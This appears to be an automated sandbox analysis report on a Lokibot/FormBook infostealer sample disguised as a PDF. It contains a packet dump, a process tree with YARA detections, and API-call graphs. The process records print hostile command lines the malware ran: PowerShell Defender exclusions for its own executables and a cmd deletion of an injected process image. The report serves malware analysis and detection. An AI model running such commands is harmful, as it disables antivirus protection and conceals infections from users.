                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:46:12.658530951 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:46:12.658566952 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:46:12.658577919 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:46:12.658587933 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:46:12.658607006 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:46:12.658620119 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:46:12.658632994 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:46:12.658720016 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:46:12.658740997 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:6
                                            Start time:09:42:03
                                            Start date:29/05/2024
                                            Path:C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
                                            Imagebase:0xa50000
                                            File size:524'288 bytes
                                            MD5 hash:CFF39149D540E851536383F64D5F5568
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low
                                            Has exited:true

                                            Target ID:11
                                            Start time:09:42:05
                                            Start date:29/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe"
                                            Imagebase:0x8b0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:09:42:05
                                            Start date:29/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:09:42:07
                                            Start date:29/05/2024
                                            Path:C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
                                            Imagebase:0xc50000
                                            File size:616'448 bytes
                                            MD5 hash:6F4CDBC9CAC665D375E1F28138E79428
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 24%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:15
                                            Start time:09:42:07
                                            Start date:29/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x6a0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:high
                                            Has exited:false

                                            Target ID:16
                                            Start time:09:42:08
                                            Start date:29/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
                                            Imagebase:0x8b0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:17
                                            Start time:09:42:08
                                            Start date:29/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x1c0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:18
                                            Start time:09:42:08
                                            Start date:29/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:19
                                            Start time:09:42:08
                                            Start date:29/05/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0x470000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high
                                            Has exited:true

                                            Target ID:20
                                            Start time:09:42:09
                                            Start date:29/05/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff633410000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:21
                                            Start time:09:42:12
                                            Start date:29/05/2024
                                            Path:C:\Windows\SysWOW64\chkdsk.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\chkdsk.exe"
                                            Imagebase:0xba0000
                                            File size:23'040 bytes
                                            MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate
                                            Has exited:false

                                            Target ID:22
                                            Start time:09:42:15
                                            Start date:29/05/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                            Imagebase:0xc50000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:23
                                            Start time:09:42:15
                                            Start date:29/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:245
                                              Total number of Limit Nodes:15
                                              execution_graph 23313 729b3b8 23314 729b543 23313->23314 23315 729b3de 23313->23315 23315->23314 23317 72997e4 23315->23317 23318 729b638 PostMessageW 23317->23318 23319 729b6a4 23318->23319 23319->23315 23409 729411d 23410 7294124 23409->23410 23412 7296d20 ResumeThread 23410->23412 23413 7296d30 ResumeThread 23410->23413 23411 729415b 23412->23411 23413->23411 23320 136d620 DuplicateHandle 23321 136d6b6 23320->23321 23360 136ac50 23364 136ad48 23360->23364 23373 136ad39 23360->23373 23361 136ac5f 23365 136ad59 23364->23365 23366 136ad7c 23364->23366 23365->23366 23382 136b034 23365->23382 23387 136afd0 23365->23387 23391 136afe0 23365->23391 23366->23361 23367 136af80 GetModuleHandleW 23369 136afad 23367->23369 23368 136ad74 23368->23366 23368->23367 23369->23361 23374 136ad59 23373->23374 23375 136ad7c 23373->23375 23374->23375 23379 136b034 LoadLibraryExW 23374->23379 23380 136afe0 LoadLibraryExW 23374->23380 23381 136afd0 LoadLibraryExW 23374->23381 23375->23361 23376 136af80 GetModuleHandleW 23378 136afad 23376->23378 23377 136ad74 23377->23375 23377->23376 23378->23361 23379->23377 23380->23377 23381->23377 23383 136afd9 23382->23383 23384 136b03a 23382->23384 23385 136b019 23383->23385 23395 136a108 23383->23395 23385->23368 23388 136afe0 23387->23388 23389 136b019 23388->23389 23390 136a108 LoadLibraryExW 23388->23390 23389->23368 23390->23389 23393 136aff4 23391->23393 23392 136b019 23392->23368 23393->23392 23394 136a108 LoadLibraryExW 23393->23394 23394->23392 23396 136b1c0 LoadLibraryExW 23395->23396 23398 136b239 23396->23398 23398->23385 23108 7297c65 23109 7297b00 23108->23109 23110 7297a79 23108->23110 23110->23109 23114 729a078 23110->23114 23120 729a07b 23110->23120 23126 729a088 23110->23126 23115 729a0a2 23114->23115 23132 729a0b9 23115->23132 23147 729a126 23115->23147 23163 729a0bb 23115->23163 23116 729a0af 23116->23110 23121 729a09d 23120->23121 23123 729a0b9 12 API calls 23121->23123 23124 729a0bb 12 API calls 23121->23124 23125 729a126 12 API calls 23121->23125 23122 729a0af 23122->23110 23123->23122 23124->23122 23125->23122 23127 729a09d 23126->23127 23129 729a0b9 12 API calls 23127->23129 23130 729a0bb 12 API calls 23127->23130 23131 729a126 12 API calls 23127->23131 23128 729a0af 23128->23110 23129->23128 23130->23128 23131->23128 23133 729a0e2 23132->23133 23178 729a8d8 23133->23178 23182 729a888 23133->23182 23190 729a736 23133->23190 23194 729aa56 23133->23194 23204 729a5f7 23133->23204 23217 729ab65 23133->23217 23222 729a511 23133->23222 23226 729a7ee 23133->23226 23230 729a64f 23133->23230 23234 729ac5f 23133->23234 23247 729acdd 23133->23247 23251 729ac2b 23133->23251 23134 729a106 23134->23116 23148 729a0b4 23147->23148 23150 729a129 23147->23150 23151 729a888 4 API calls 23148->23151 23152 729a8d8 2 API calls 23148->23152 23153 729ac2b 6 API calls 23148->23153 23154 729acdd 2 API calls 23148->23154 23155 729ac5f 6 API calls 23148->23155 23156 729a64f 2 API calls 23148->23156 23157 729a7ee 2 API calls 23148->23157 23158 729a511 2 API calls 23148->23158 23159 729ab65 2 API calls 23148->23159 23160 729a5f7 6 API calls 23148->23160 23161 729aa56 6 API calls 23148->23161 23162 729a736 2 API calls 23148->23162 23149 729a106 23149->23116 23150->23116 23151->23149 23152->23149 23153->23149 23154->23149 23155->23149 23156->23149 23157->23149 23158->23149 23159->23149 23160->23149 23161->23149 23162->23149 23164 729a0e2 23163->23164 23166 729a888 4 API calls 23164->23166 23167 729a8d8 2 API calls 23164->23167 23168 729ac2b 6 API calls 23164->23168 23169 729acdd 2 API calls 23164->23169 23170 729ac5f 6 API calls 23164->23170 23171 729a64f 2 API calls 23164->23171 23172 729a7ee 2 API calls 23164->23172 23173 729a511 2 API calls 23164->23173 23174 729ab65 2 API calls 23164->23174 23175 729a5f7 6 API calls 23164->23175 23176 729aa56 6 API calls 23164->23176 23177 